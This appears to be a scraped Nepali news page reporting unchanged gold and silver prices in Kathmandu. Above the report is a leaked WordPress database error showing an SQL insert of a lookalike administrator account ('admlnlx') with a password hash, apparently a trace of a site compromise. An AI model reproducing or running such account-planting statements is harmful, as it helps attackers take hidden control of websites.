WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/oiiZF03O7hrDdHGn5Vfw9ayVFPJ9/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:11:42', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ११-
आज सुनको भाउमा कुनै घटबढ् भएको छैन । हिजो प्रतितोला ५२ हजारमा कारोबार भएको सुनको मूल्य आज पनि प्रतितोला ५२ हजारमा कारोबार भैरहेको नेपाल सुनचाँदी व्यवासायी महासंघले जनाएको छ । त्यस्तै चाँदीको मूल्यमा पनि कुनै घटबढ् भएको छैन । हिजो प्रतितोला ७ सय ५० रूपैयाँमा कारोबार भइरहेको चाँदी आज पनि ७ सय ५० रूपैयाँमा कारोबार भइरहेको नेपाल सुनचाँदी व्यवासायी महासंघले जनाएको छ ।